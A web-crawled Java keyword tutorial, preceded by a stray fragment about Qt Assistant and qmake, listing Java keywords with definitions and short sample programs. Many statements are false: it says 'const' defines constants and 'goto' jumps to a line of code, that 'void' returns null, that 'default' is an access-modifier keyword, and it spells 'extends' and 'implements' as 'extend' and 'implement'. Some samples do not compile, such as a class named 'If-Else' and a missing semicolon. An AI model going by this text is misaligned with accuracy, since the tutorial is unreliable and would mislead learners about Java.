bookmarks history and incremental search. Qt Assistant is used by both Qt Designer and Qt Linguist for browsing their help documentation. To ease portability we now provide the qmake utility to replace tmake. QMake is a C++ version of tmake which offers additional functionallity that is difficult to reproduce in tmake. Trolltech uses qmake in its build system for Qt and related products and we have released it as free software.
http://doc.trolltech.com/3.1/keyfeatures30.html
crawl-001
refinedweb
2,592
55.54
- To learn different keywords in java and its implementations follow the steps given below : - Java has keywords which are enum, abstract, boolean, char, int, float, byte, case, break, finally, default, do, if, else, for, continue, while, switch, short, long, return, double, private, public, protected, package, try, catch, throw, throws, void, const, this, super, static, synchronized, new, implement, instanceof, extend, class, volatile, transient, strictfp, assert, native, interface, import. - Reserved Keywords : true, false, null, goto - Here is the explanation of the keywords : - abstract: – An abstract class & method is declared with keyword abstract. In this scenario abstract class can be extended but cannot be instantiated. In this case if a subclass of an abstract class does not implement the abstract methods of its superclass, subclass is also abstract. - boolean: – A boolean variable indicate values only true or false. A boolean may not convert into numeric values. This is primitive data type. Default value is false. - char: – A char variable used for storing a single Unicode character. This char keyword is used to declare method return value of type character. It has 16 bit size. \ ” − double quote \ – backslash. \f − form feed \’ − single quote \n − newline \b – backspace - int : – It defines constants MIN_VALUE and MAX_VALUE which represents the range of values for int type. int values are negative, positive or may be zero. - float : – This is java primitive type, Size is 32 bits. Its default value is 0.0 - byte : – byte size is 8 bit integer value. It can store integer value in the range -128 to 127.Default value is 0. - short : – Size of the short data type is 16 bit. Its min value is -32,768 and max value is 32,767. It is a java primitive data type. In this case default value is 0. A short is two times as small as int. - long : – This is a java primitive type. Size of long data type is 64 bit. Minimum value is -2^63 and maximum value is 2^63-1. In this case default value is 0L. This type is used when large range than int is needed. - double : – This is a java primitive type. It may store floating point value. The size is 64 bit float primitive type. - break : – The break keyword is used to exit a for loop, while loop, do loop or to the end of a case block in a switch statement. - continue : – Continue is helpful for skipping the next iteration of a do, while or for loop statement. - try, catch, finally : – try block is used for throwing the exception. Every try block must have one or more catch blocks or finally block. catch keyword is used for catching the exception which is thrown from the try block. Each catch block handles the various types of exceptions. finally keyword is used to define a block that is always executed in a series try, catch, finally statement. Every try block must have at least one catch or finally block. When try block is executed after that the code of finally block must be executed with or without exception, if any problem occur during execution in the catch block then also finally block must be executed at least once. - do : – do loop body is always executed at least once. Semicolon is always required after the conditional expression. - while : - This keyword is indicates that the loop is executed continuously till condition is true. - if - else : - “if “is used for executing logical statements or conditional statements. An if statement has else block which is optional containing the code that is executed if the condition is false. else keyword is always used with the “if” keyword. The else block is optional and this block is executed when if condition is false. - switch, case, default : - The switch keyword is used to select execution of one of various code blocks based on expression or condition. To exit the switch statement, break statement must be included at the end of the block. case does not have an implicit ending point. A break keyword must typically used at the end of each case block to exit the switch statement. Without a break statement, the flow of execution will flow into all defined cases and last follow default block. default is access modifier, when we don’t use any access modifier then by default it is treated as default access modifier. And it can access only within package this is used in the switch cases. It will execute if none of the defined cases are matched to the condition. - void, return : - When method does not return any type of value that time void keyword is used. This void keyword in the programming language returns the null value. The return keyword returns a value. The parentheses are optional surrounding the return value. - private : - This keyword is access control modifier. This is applied to a method or a field. It can also apply to a constructor. This is a most restrictive level than access modifier. When we declare a method or variable and a constructor as a private then that a method or a variable and a constructor cannot access outside the class. - public : -This public keyword is used to declare a class, a method or a field public, that means this methods or a field can access anywhere like within same class, within same package, outside package in subclass and outside package. This is the lowest restrictive level. - protected : -This access modifier is accessible in within class, within package and within outside package by subclass only. Not accessible in outside package. - package : - package keyword is used for declaring a java package. When source file does not containing a package statement that time classes defined in the file are in the default package. - throw : - This keyword is used for explicitly throwing exception. throw keyword is used within the method. We cannot throw multiple exceptions at a time. throw keyword is used with checked as well as unchecked exceptions. - throws : - This throws keyword is used with only checked exception. throws is declare with method definition. - const : - This keyword const is used in java for defining a constant. If you declaring any variable const then after you cannot alter that variable. - this : - this is used to refer the current object. When ambiguity occur between parameter and instance variable then this keyword resolve this type of problem. This is a special keyword in java. - super : - super is special keyword in java. Super keyword is used inside the sub-class. Through super keyword only public and protected methods are called. - new : - new keyword is used to create array object or instance of a class. This new keyword is used for allocates memory dynamically. You can also used new keyword for creating simple java object. - static : - Static variables are known as global variables or class variables. When you define variable as a static then there will be only one copy of that static variables created into JVM memory. This static variable shares only one copy throughout the class of instances. In java, static keyword is used for memory management. static variables are helpful to save memory. - extend : - This extend keyword is used in a class declaration to define the superclass. Also used in an interface declaration to define one or more super interfaces. At a time a class may only extend one other class. In inheritance process of java extend keyword is used. It means it adds the method and variables of that extended class. - class : - class keyword is used to define a class. Class completed with curly braces and within that curly braces variables, methods are declared. - import : - Import keyword is used in java to import user defined and built-in packages into java source file. So it will help you as your class can refer to a class that is into another package, by using its name. - implement : - This implement keyword is used to declare the interfaces that are to be implemented by the class. This is used in class definition. One class may implement multiple interfaces. implement keyword is used for inheritance. implement keyword support to the multiple inheritances. - interface : - When you declare a special type of class that class body contains only constant fields, static interfaces and abstract methods. Using interface keyword interfaces are declared. It cannot be instantiated, but implemented. - synchronized : - This keyword is used for a method can accessed by only one thread at a time. It can be applied only to a method, not on a variables or classes. - volatile : - In this case you can specify member variable that variable may be modified asynchronously by more than one thread. This keyword may not be implemented in many JVM. - instanceof : - This keyword is used to determine the class of an object. It produces a boolean result. - transient : - This can only be applied to fields or member variable. Transient variable is not saved when an object gets serialized. This is used to provide you some control over serialization process and gives you flexibility to exclude some of object properties from serialization process. - strictfp : - For floating-point calculation use this strictfp keyword which ensures portability i.e. platform independent. This is used with class and variables only. When you want the answer from your code, then you need to declare the strictfp modifier. - assert : - You can define assert statement with the help of assert keyword. It is used to test your assumptions about the program. While executing assertion, it is consider being true. If it fails, JVM will throw an error named AssertionError. It is mainly used for testing purpose. - native : - This keyword is only applied to methods, not variables or classes. - enum : - This is a type whose field consists of a fixed value of constant. It extends parent class called as Enum. It can implement interfaces. Using new operator we cannot create instance of enum. In java constructor of enum is always private. Constants of enum are implicitly final and static. - for : - It is a pretest loop statement. In this case initialization and increment is an expression. A boolean expression also is an expression that can be true or false. In this case when loop is executed then first initialization expression is evaluated. This expression assigns the initial value to loop control variable (eg. j=1). The boolean expression is tested start of the each iteration of the loop. The loop terminates when it is false and expression is frequently a comparison (j<=10). After that increment expression is evaluated, that can increment the control variable (eg. j++). - Explanation of Reserved Keywords : - true: - This returns a boolean result which is true only. - false : - This returns a boolean result which is false only. - null : - This reserved keyword represents no value. Primitive type of variables null cannot be assigned like (boolean, byte, char, double, float, int, long, short). - goto : - This goto keyword is used to jump to the respective line of code or execute a particular segment of code. - Hence, we have successfully learnt different keywords in java and its implementations . Syntax : public abstract class MyDemo { } Example : This example shows the use of abstract keyword abstract class J //declare class as abstract { abstract void display(); //define method } class K extends J //create class and extend it with abstract class { void display() //declare method { System.out.println ("This is abstract program!"); //print statement } public static void main (String[] args) //main method { K k = new K (); //create object k.display (); //call method } } Output : This is abstract program! Syntax : boolean val = true; if (val) { //statement } Example : This example shows the use of boolean keyword public class JavaBlnSample { public static void main (String [] args) //main method { //create an boolean object from boolean value Boolean Ob1 = new Boolean (true); { /*create an boolean object from string. It show true if the string is not null else shows false*/ Boolean Ob2 = new Boolean ("false"); //print value of boolean object from string System.out.println (Ob1); System.out.println (Ob2); } } } Output : true false Example : This Java Example shows how to declare and use Java primitive char variable inside a java class. public class Char { //create class public static void main(String[] args) //main method { //define char variables char c1 = 'p'; char c2 = 80; //below statements print the output of ASCII value of 80 System.out.println ("Value of char variable c1 is:" + c1); //ASCII code of 'P' System.out.println ("Value of char variable c1 is:" + c2); } } Output : Value of char variable c1 is: p Value of char variable c1 is: P Example : This Java Example shows how to declare and use Java primitive int variable inside a java class. public class Int { public static void main(String[] args) { // here assigning default value is optional. //declare integer a and b int a = 16; int b = 101; //print values of variable a and b System.out.println ("Value of int variable i is:" + a); System.out.println ("Value of int variable j is:" + b); }} Output : Value of int variable i is: 16 Value of int variable j is: 101 Example : This Java Example shows how to declare and use Java primitive float variable inside a java class. public class Float { public static void main(String[] args) { float f = 14.3f;//declare float value System.out.println ("Value of float variable f is:"+f); //print value } } Output : Value of float variable f is: 14.3 Example : This Java Example shows how to declare and use Java primitive byte variable inside a java class. public class Byte { public static void main(String[] args) { //declare byte values to variable a and b byte a = 43; byte b = 14; //print values of a and b System.out.println ("Value of byte variable a is:" + a); System.out.println ("Value of byte variable b is:" + b); } } Output : Value of byte variable a is: 43 Value of byte variable b is: 14 Example : This example shows how short is used in a program. public class Short { public static void main(String[] args) { //declare short values to variable i and j short i = 18; short j = 35; //print values of i and j System.out.println ("Value of short variable i is:" + i); System.out.println ("Value of short variable j is:" + j); }} Output : Value of short variable i is: 18 Value of short variable j is: 35 Example : This example shows how an object of Long can be declared and used. public class LongProgram { public static void main(String[] args) { //Create a Long object from long long l = 46; Long lObj = new Long (l); //print value of Long objects System.out.println (lObj); } } Output : 46 Example : This example shows how to use double in a class. public class JavaDouble { public static void main(String[] args) { double d = 1643.43//declare value of double with variable d // print value of double System.out.println ("Value of double variable d is:" + d); } } Output : 1643.43 Example : This Java Example shows how to break the loop or condition in a class. public class Break{ public static void main(String[] args){ int j,k; System.out.println ("Numbers between 1 to 8 :"); /*check j is less than 8 then it increment with 1 and go to next loop and check k is less than j then go to if loop addition of j and k equal to 6*/ for (j = 1; j < 8; j++) { for (k = 2; k <j; k++) { if (j+k==6) { break; }//break if condition is false } if (j==k) { //check j equal to k if yes then print j System.out.println (" "+j); } } } } Output : Numbers between 1 to 8: 2 3 5 6 7 Example : This example shows how to use java continue statement to skip the iteration of the loop. public class Continue { public static void main(String args[]) { //use array to declare integer int [] num = {1,14,9,16,5,7}; for(int a : num ) {//store num values in int a //check if a equals to 16 then skip 16 and print next values if( a == 16 ) { continue ;}//skip 16 and continue iteration System.out.println (a); //print statement System.out.println ("\n"); } } } Output : 1 14 9 5 7 Example : This Java Example shows how to use try catch and finally in a class. public class Try { public static void main(String args[]) { int a=10; int b=5; try //throws the exception { int x=a/(b-b); //Exception here } catch (ArithmeticException e)//catch the exception { System.out.println ("Division by zero"); } finally //finally block { int y=a/b; System.out.println ("y = "+y); //print output } } } Output : Division by zero y = 2 Example : This Java Example shows how to use do while loop to iterate in Java program. public class DoWhile { public static void main(String[] args) { //In this case the condition is checked after executing the loop body. //So loop will be executed at least once even if the condition is false. int a =0; //declare int value in variable i do { //start do loop System.out.println ("a is : " + a);//print a a++;//increment a by 1 //if the condition is false then execute while loop }while(a < 4); } } Output : a is: 0 a is: 1 a is: 2 a is: 3 Example : This example shows how while keyword is used in a class. public class While {//create class public static void main(String args[]){//main method int num = 16; //define integer num while (num < 20) { /*check condition num is greater than define integer or not if true then print num*/ System.out.println ("Value of num:" + num); //print statement num ++; } }//num increment by one Output : Value of num: 16 Value of num: 17 Value of num: 18 Value of num: 19 Example : This example shows how if-else statement used in a class. public class If-Else { public static void main (String [] args)//main method { int a = 16; if (a > 100)//check the condition a is greater than 100 System.out.println ("a is greater than 100"); //print statement else if (a > 50)//else if a is greater than 50 System.out.println ("a is greater than 50"); //print statement else System.out.println ("a is less than 50"); //else print statement System.out.println ("a="+a); } } Output : a is less than 50 a=16 Example : This example shows how to use switch-case and default in a class. class Switch{ //create class switch public static void main(String[] args) {//main method int day =4;//accessing the 4th day of the week switch (day) {//day will switch to the 4th case //we uses break keyword to break the cases if true case 1: System.out.println("Monday"); break; case 2: System.out.println("Tuesday"); break; case 3: System.out.println("Wednesday"); break; case 4: System.out.println("Thursday"); break; case 5: System.out.println("Friday"); break; case 6: System.out.println("Saturday"); break; //if we don’t specify day then it will print Sunday default: System.out.println("Sunday"); break; } } } Output : Thursday Example : This example shows how to write void and return in a class. public class Return { //declare integer with static static int a=5; static int b=11; public static void main(String[] args)//void is used { System.out.println (a+b); //addition of a and b return;//return give addition of a and b } } Output : 16 Example : private void method (); Example : This example shows how to use public a class. //Save with class First public class First{ //create class First public void msg(){ System.out.println ("This is Public modifier"); } } //Save with class Second package Topic;//create new package import Topic1.*;//import package Topic1 class Second//create class Second { public static void main(String args[]){//main method First obj = new First (); //create object of class First obj.msg (); //call method of class First } } Output : This is Public modifier Example : This example shows how to use protected in a class. //In same project create a new class save by First.java public class First//create class First { protected void msg() { //declare method as protected System.out.println ("This is protected") ;}} //print statement. // In same project create another calss and save by Second.java class Second extends First//extends class First { public static void main(String args[]){ //main method Second obj = new Second (); //create object of class Second obj.msg () ; } } Output : This is protected Example : package com.mypack public class MyFavourite { } Example : This example shows how to use static and new in a class. public class Stud // create class { int rolno; //define integer String name; //define string String address; static String division = "A"; //define static variable //define constructor with parameters Stud (int rn, String nm, String adds) { rolno = rn; name = nm; address = adds; } void display() //method declaration { System.out.println (rolno+" "+name+" "+address+" "+division); } public static void main(String[] args) //start execution { //create object with new keyword Stud s1 = new Stud (101, "Pooja", "Vashi"); Stud s2 = new Stud (102, "Shilpa", "Sanpada"); s1.display (); //call method s2.display (); //call method } } Output: 101 Pooja Vashi A 102 Shilpa Sanpada A Example : This example shows how to use extend in a class. //In same project create two classes save the first class as ParentEX public class ParentEx { public String n1 = null; public String n2 = null;//define string public void printOut()//declare method { System.out.println ("Output of First:"+n1); System.out.println ("Output of Second:"+n2); } } //In the same project create new class and save it as ChildEx public class ChildEx extends ParentEx //extends a parent class { public void parentMeth() { n1="Hi this is First"; n2="This is Second class where extends used"; printOut (); } public static void main (String[] args) { ChildEx ce = new ChildEx (); //object creation ce.parentMeth (); //call method } } Output : Output of First: Hi this is First Output of Second: This is Second class where extends used Example : class MyHome //create class { int num; //define integer void display()//declare method { System.out.println (“num”) ; }//print statement } Output : num Example : class Maml implements Ani { } class Cat extends Maml { public static void main (String [] args) { Maml m = new Maml (); //create object of maml Cat c = new Cat (); //create object of cat //use instanceof produce boolean result System.out.println (m instanceof Ani); System.out.println(c instanceof Maml); System.out.println(c instanceof Ani); } } Output : true true true Example : This example shows how to use for loop in a class. public class ForLoop { public static void main(String[] args) { // Initialization is executed only once. //loop is executed till condition is true for(int num = 0; num <= 2 ; num++) //print the num value System.out.println ("Number is : " + num); } } Output : Number is : 0 Number is : 1 Number is : 2 Very Useful Blog I really Like this blog and i will refer this blog…
https://blog.eduonix.com/java-programming-2/learn-different-keywords-in-java-and-its-implementaions/?replytocom=22419
CC-MAIN-2020-45
refinedweb
3,758
64.51
Something about implementing Comparator interface isn't very clear to me: overriding the compare method. Like here for example: Code : //This sorts a list of objects holding information based on age: the name and the age of the person public class Person { String name; int age; public Person (String name, int age) { this.name = name; this.age = age; } public String getName() { return name; } public int getAge() { return age; } public String toString() { return name+" \t "+age; } class SomeComparator implements Comparator <Person> //Why use Person for generics? { public int compare(Person pers1, Person pers2) { int age1 = pers1.getAge(); int age2 = pers2.getAge(); if (age1 == age2) { return 0; } else if (age1 > age2) { return 1; } else { return -1; } } } public static void main(String[]args) { ArrayList<Person> list1 = new ArrayList<Person>(); list1.add(new Person("Judy", 18)); list1.add(new Person("Alex", 29)); list1.add(new Person("Jared", 14)); Collections.sort(list1, Collections.reverseOrder(new Person.SomeComparator())); System.out.println(list1); } } What exactly is happening behind the scenes? I don't understand mostly the part where it returns a 0, a 1, or a -1. After it returns one of those values, what really happens next? For the displaying of the list, is the method toString() being accessed to output the list in the System.out.println statement? For the generics, why do we use Person? That's a lot of questions I know but it is just really substantial for me to get the hang of this. If you could add more key explanations other than those that answer my questions above (I might have missed something else), it would be really appreciated! Thank you in advance! :)
http://www.javaprogrammingforums.com/%20java-theory-questions/36185-comparator-implementation-printingthethread.html
CC-MAIN-2015-35
refinedweb
273
57.87
Experiment to safely refactor your code in Python "Will my refactoring break my code ?" is the question the developer asks himself because he is not sure the tests cover all the cases. He should wonder, because tests that cover all the cases would be costly to write, run and maintain. Hence, most of the time, small decisions are made day after day to test this and not that. After some time, you could consider that in a sense, the implementation has become the specification and the rest of the code expects it not to change. Enters Scientist, by GitHub, that inspired a Python port named Laboratory. Let us assume you want to add a cache to a function that reads data from a database. The function would be named read_from_db, it would take an int as parameter item_id and return a dict with attributes of the items and their values. You could experiment with the new version of this function like so: import laboratory def read_from_db_with_cache(item_id): data = {} # some implementation with a cache return data @laboratory.Experiment.decorator(candidate=read_from_db_with_cache) def read_from_db(item_id): data = {} # fetch data from db return data When you run the above code, calling read_from_db returns its result as usual, but thanks to laboratory, a call to read_from_db_with_cache is made and its execution time and result are compared with the first one. These measurements are logged to a file or sent to your metrics solution for you to compare and study. In other words, things continue to work as usual as you keep the original function, but at the same time you experiment with its candidate replacement to make sure switching will not break or slow things down. I like the idea ! Thank you for Scientist and Laboratory that are both available under the MIT license.
https://www.logilab.org/blog/6056/blogentries/nchauvat?vtitle=Blog%20entries%20by%20Nicolas%20Chauvat%20%5B33%5D
CC-MAIN-2018-26
refinedweb
299
58.72
Diff SPARQL Turtle This page gathers together difference between SPARQL 1.0 and Turtle. See also: Contents Relevant RDF WG Decisions - Resolution of ISSUE-18 - Dots inside prefix names (either namespace or local part) See also: - Mark xs:string as archaic, recommend that systems silently convert xs:string data to plain literals. Decimals 18. is changed to 18.0 ] . [ :p 3 ; :q 4 ] } SELECT * { [ :p 1 ; :q 2 ] } RDF Collections A less frequent case is a free-standing lists and subject lists. (1 2 3 4) . SELECT * { (1 ?x 3 4) . } SELECT * { (1 2) rdfs:comment "List" } Turtle allows (1 2 3 4) rdfs:comment "List" . but not (1 2 3 4) . Trailing dots A final DOT is not required in SPARQL: INSERT DATA { :s :p :o } SELECT * WHERE { ?z a foaf:Person ; foaf:name ?name ; foaf:knows [ foaf:name ?name2 ] } This is more significant when TriG is considered. Strings Using ' and ''' for string quoting is legal in SPARQL. Because SPARQL queries can be embedded in programs, allowing a character that does not require programming language quoting is useful. Added in the Turtle working draft (v 1.13): String production. Added in the Turtle working draft (v 1.13): PN_LOCAL token. Escape Processing Turtle and SPARQL treat \u escape processing differently. SPARQL Codepoint Escape Sequences defines \u processing to happen on the input stream charcater stream before the grammar is applied. \u esacpes are converted to the codepoint and any significant characters (e.g. delimiter ") apply as usual. Turtle String Escapes happen after parsing, and only in strings and IRI references. Significant characters do not delimit. Does not apply to prefixed names. Legal and the same in both (for different reasons): "\u03B1" # "α" Codepoint x03B1 is Greek small alpha <ab\u00E9xy> # Codepoint 00E9 is Latin small e with acute - é Legal in both but different: #\u0020Comment Legal SPARQL, illegal in Turtle (see extension below): a:\u03B1 Legal SPARQL, illegal in Turtle: uses a syntax-significant character. a\u003Ab # a:b -- codepoint x3A is colon Legal in Turtle, illegal in SPARQL "ab\u0022cd" # x22 is " Possible extension to Turtle Adding a UCHAR to the qname characters enables \u03B1:a, per yacker results for @prefix α: <> . <ab\u00E9xy> \u03B1:p "ab\u0022cd" .
https://www.w3.org/2011/rdf-wg/wiki/Diff_SPARQL_Turtle
CC-MAIN-2020-40
refinedweb
370
59.4
Introduction Chapter 2 of David MacKay’s excellent book Information Theory, Inference, and Learning Algorithms1 is a general introduction to probability. One of the examples asks about some dice-rolling:? When I first encountered this, I found it quite hard to tackle, because it’s one of those problems which is almost trivial if you look at it in the right way, but hard otherwise. The key is to educate your intuition so that you do indeed see it from the right perspective. I don’t remember how I tackled it in the past, but when I was discussing it recently, it struck me as a nice thing to simulate, and my favourite language for such things is Haskell2. Random Numbers in Haskell In many languages, you can generate a random number by calling a function e.g. in python3 we might simulate a couple of dice-rolls thus: >>> random.randint(1, 6) 2 >>> random.randint(1, 6) 6 Pedantically this generates a pseudo-random4 number, and behind the function call there’s some hidden state so that repeated calls return different results. Haskell’s idea of a function is much closer to the mathematical one: in particular functions are pure5 which means that if we call a function again with the same arguments we’ll get the same result. We could proceed by explicitly passing the state of the random number generator around. However, Haskell is lazy6 and so copes well with infinite lists. So, we can define an infinite list of random rolls happy in the knowledge that the samples will only be generated as they’re needed. Once defined we can pass the infinite list of rolls around just like any other list. The code which analyses the sequence knows nothing about randomness: it just sees the numbers. Happily the System.Random7 package contains all the code we need to generate the list: ghci> import System.Random ghci> let rolls = randomRs (1,6) . mkStdGen ghci> take 10 $ rolls 42 [6,4,2,5,3,2,1,6,1,4] ghci> sum . take 100000 $ rolls 42 350050 The key remaining difference is that we have to specify an explicit seed (here 42). In other languages this often defaults to some external source of entropy e.g. the system clock. If you’re unfamiliar with Haskell and find the . and $ confusing, this Stack Overflow8 article might help. Some helpful utility functions Haskell has many list handling functions in the standard Data.List9 package. However, it will be useful to define several new functions, all of which are simple wrappers around Data.List.Split10: import qualified Data.List.Split as Sp splitAfter :: (a -> Bool) -> [a] -> [[a]] splitAfter p = Sp.split (Sp.keepDelimsR $ Sp.whenElt p) splitBefore :: (a -> Bool) -> [a] -> [[a]] splitBefore p = Sp.split (Sp.keepDelimsL $ Sp.whenElt p) takeUntil :: (a -> Bool) -> [a] -> [a] takeUntil p = head . (splitAfter p) Hopefully the names and function signatures are enough to explain what these do, but here are some examples: ghci> splitAfter (== 'c') "abcdefabcdef" ["abc","defabc","def"] ghci> splitBefore (== 'c') "abcdefabcdef" ["ab","cdefab","cdef"] ghci> takeUntil (== 'c') "abcdefabcdef" "abc" As is perhaps clear now, our general plan for simulating the dice rolls will be to take the infinite list of rolls, then cut it into sections whose lengths we’ll average. With this in mind, we’ll find a few other functions helpful too: averageOver :: Integral a => Int -> [a] -> Double averageOver n xs = (fromIntegral sigma) / (fromIntegral n) where sigma = sum $ take n xs averageLength :: Int -> [[a]] -> Double averageLength n = averageOver n . map length We can easily calculate the mean dice-roll: ghci> averageOver 10000 $ rolls 42 3.4912 However, we’re usually interested in the average length of a sequence, so here’s a (very artificial) example: ghci> averageLength 10000 . map (\n -> replicate n 'a') $ rolls 42 3.4912 To see why this works consider what the map does to the first five rolls: ghci> take 5 $ rolls 42 [6,4,2,5,3] ghci> take 5 . map (\n -> replicate n 'a') $ rolls 42 ["aaaaaa","aaaa","aa","aaaaa","aaa"] The simulations Having prepared our tools, we can now actually tackle the questions. Part A The question asks: What is the mean number of rolls from one six to the next six ? A reasonable approach is to split the list of rolls whenever we see a six, then measure the lengths of the sublists: a_seqs :: [Roll] -> [[Roll]] a_seqs = splitAfter (== 6) ghci> take 4 . a_seqs $ rolls 42 [[6],[4,2,5,3,2,1,6],[1,4,4,4,1,3,3,2,6],[2,4,1,3,1,1,5,5,5,1,3,6]] ghci> averageLength 1000 a_seqs $ rolls 42 6.137 ghci> averageLength 100000 a_seqs $ rolls 42 5.98306 It seems likely, and unsurprisingly, that this answer will tend to six as the number of samples tends to infinity. This is easy to show analytically too! Given that the dice is fair, there is a one-sixth change of rolling a six, and a five-sixths change of not. So, the chance of having to wait n rolls for a six is:\[ p(n) = \frac{1}{6} \times \left(\frac{5}{6}\right)^{n-1}. \] and thus the mean number of rolls is given by,\[ \mu_A = \sum_{i = 1}^{\infty} i \ \times \theta \, \left(1 - \theta\right)^{i-1}, \] where \(\theta = 1/6\). Evaluating this11 does indeed give,\[ \mu_B = \frac{1}{\theta} = 6. \] Parts B & C The question asks: Between two rolls, the clock strikes one. What is the mean number of rolls until the next six? The first problem here is that we have no notion of the time in our simulation, so let’s add one: addTimes :: [a] -> [(Time,a)] addTimes = zip times where times = cycle [0..longPeriod - 1] ghci> take 5 $ rolls 42 [6,4,2,5,3] ghci> take 5 . addTimes $ rolls 42 [(0,6),(1,4),(2,2),(3,5),(4,3)] We’ve replaced the list of rolls with a list of (time,roll) pairs. We need some convention about time: let’s say that “one o’clock” corresponds to t = 0, and the roll happens after the tick. Thus (0,6) means that the roll immediately after the clock struck was a 6. Simulating this part is a little bit more complicated but it’s not too bad. Begin by splitting the list when the clock chimes, then discard the sequence after the first 6. In code: b_seqs :: [Roll] -> [[(Time,Roll)]] b_seqs = map (takeUntil (\(t, r) -> r 6)) . splitAfter (\(t,r) -> t 0) . addTimes ghci> take 3 . b_seqs $ rolls 42 [[(0,6)] ,[(1,4),(2,2),(3,5),(4,3),(5,2),(6,1),(7,6)] ,[(1,3),(2,1),(3,2),(4,6)]] ghci> averageLength 1000 b_seqs $ rolls 42 6.21 ghci> averageLength 100000 b_seqs $ rolls 42 6.01542 The calculation is noticably slower, but the answer seems to be the same. That seems reasonable: we are just picking random points in the sequence of rolls and starting our count there. Nothing in the analytic result above cares where we start, so the analytic result is also unchanged! Although I’ve not done it explicitly here, I think it’s clear that part C is just the same but with time running backwards. Part D The question asks: What is the mean number of rolls from the six before the clock struck to the next six? Today, it seems sensible to me to tackle this question by splitting the list of rolls every time we see a six, then throwing out those sequences in which the clock doesn’t chime. The code is straightforward and gives the right answer: d_seqs :: [Roll] -> [[(Time,Roll)]] d_seqs = filter (any (\(t,r) -> t 0)) . splitAfter (\(t,r) -> r 6) . addTimes ghci> averageLength 100000 d_seqs $ rolls 42 11.1093 However, I worry somewhat that this code is only easy to write because I know how to think about the question. So, here’s a messier approach which relates more closely to the words in MacKay’s book. We begin by adding another component to the list of rolls, which counts how long it’s been since we rolled a six. A couple of caveats: it fudges the start of the sequence, and it resets the count in the tuple after the six is rolled: addTimeSince6 :: [Roll] -> [(Roll,Int)] addTimeSince6 = tail . addT where addT xs = (0,0):(zipWith f xs (addT xs)) f r (r',i) = (r, if r' == 6 then 1 else i + 1) ghci> addTimeSince6 [1,2,6,1,2,6,1,2] [(1,1),(2,2),(6,3),(1,1),(2,2),(6,3),(1,1),(2,2)] ghci> addTimes . addTimeSince6 $ [1,2,6,1,2,6,1,2] [(0,(1,1)),(1,(2,2)),(2,(6,3)),(3,(1,1)),(4,(2,2)),(5,(6,3)),(6,(1,1)),(7,(2,2))] If we annotate this sequence with the time, and split it where the clock chimes, we can read off the length directly by looking for the first six in the break: d_lengths' :: [Roll] -> [Int] d_lengths' = tail . map len . splitBefore (\(t,(r,q)) -> t 0) . addTimes . addTimeSince6 where len [] = 0 len xs = head [ q | (t,(r,q)) <- xs, r 6] ghci> averageOver 3000 . d_lengths' $ rolls 42 11.08 The code is slow (which is why we only consider 3,000 samples) but it appears to get the same result! If we wanted to be sure, we can compare the lengths directly: *Main> take 20 . map length . d_seqs $ rolls 42 [1,14,43,7,13,8,6,9,5,7,27,41,1,3,22,14,8,9,18,9] *Main> take 20 . d_lengths' $ rolls 42 [1,14,43,7,13,8,6,9,5,7,27,41,1,3,22,14,8,9,18,9] Happily these sequences agree, at least up to the first twenty terms. Less happily, I think the code is rather messy, and probably reasonably opaque if you’re not familiar with Haskell. Finally, let’s derive this analytically. The key insight here is that the chance of the clock chiming in a particular run between sixes depends on the length of the sequence. Although all ticks are equally likely to hear the clock chime, longer sequences have more ticks and so are more likely. Thus the probability of being in a sequence of length \(i\) when the clock chimes is,\[ q_i \propto i \times p_i, \] Now,\[ p_i \propto \left(1 - \theta\right)^{i - 1}, \] So,\[ q_i \propto i \times \left(1 - \theta\right)^{i-1}. \] Thus, multiplying all terms by \(1 - \theta\), the mean number is given by\[ \mu_D = \frac{\sum_{i = 1}^{\infty}{i^2\, \left(1 - \theta\right)^i}}{\sum_{i = 1}^{\infty}{i\, \left(1 - \theta\right)^i}}. \] Evaluating this12 does indeed show that\[ \mu_D = \frac{2}{\theta} - 1 = 11. \] Other ways to (roll a) die As we mentioned above, because we hide all the randomness behind the infinite list of rolls, it is easy to consider other situations without changing the analysis code. A dodgy die Suppose we have a dodgy die which due to bad planning13 has six dots painted where there should be five. In other words, there the chance of rolling a six is now one-third. How does this affect our answers ? addBias :: [Roll] -> [Roll] addBias = map (\i -> if i == 5 then 6 else i) ghci> take 10 $ rolls 42 [6,4,2,5,3,2,1,6,1,4] ghci> take 10 . addBias $ rolls 42 [6,4,2,6,3,2,1,6,1,4] ghci> averageLength 10000 . a_seqs . addBias $ rolls 42 3.0129 ghci> averageLength 10000 . d_seqs . addBias $ rolls 42 4.958 So, it seems that the means change to 3 and 5. Sure enough, if we put \(\theta = 1/3\) into the expressions we derived about we find that:\[ \mu_A = 3, \mu_D = 5. \] A magic die Now suppose that instead of an incompetent manufacturer, our die came from a magician. In particular, suppose that the dice always rolls the sequence 1,2,3,4,5,6,1,2,... We will leave the implementation of this for now, but it’s easy to simulate: magicRolls :: [Roll] magicRolls = cycle [1..6] ghci> take 10 $ magicRolls [1,2,3,4,5,6,1,2,3,4] *Main> averageLength 10000 . a_seqs $ magicRolls 6.0 *Main> averageLength 10000 . d_seqs $ magicRolls 6.0 \(\mu_A\) stays the same, but \(\mu_D\) is now six! To understand why it is important to notice that the magic die rolls six on every sixth roll, and so the sequences between sixes are all precisely six rolls long. This means that the chime is equally likely to fall into all the sequences, and whichever one it does pick, is bound to be six rolls long. Implementation notes Performance issues Although Haskell is a very pleasant environment for doing this sort of work, in practice you can hit performance issues. There are a couple of problems: - The ghci REPL doesn’t compile the code efficiently, so in practice you’re better off compiling the code as a library, then loading the object into ghci. - There are space leaks in the code, so it doesn’t scale well. For the simple sequence stuff, this isn’t a problem, but it for the second part D calculation it is a nuisance. Day length Although the question talks about a daily chime, in practice all we need are events sufficiently widely spaced that they won’t interact. This translates to saying that we can be confident that a six will occur between two sets of chimes. Days are 86,400 seconds long, so one o’clock chimes occur at least 43,200 seconds apart. However, given that\[ \left(\frac{5}{6}\right)^{100} \approx 1.2 \times 10^{-8} \] it seems enough to work in a world where the chimes happen every 100 seconds. The code above does this, and runs much more quickly as a result. References - 1. - 2. - 3. - 4. - 5. - 6. - 7. - 8. - 9. - 10. - 11. - 12. - 13.
https://www.mjoldfield.com/atelier/2017/06/waiting-for-six.html
CC-MAIN-2019-26
refinedweb
2,336
71.75
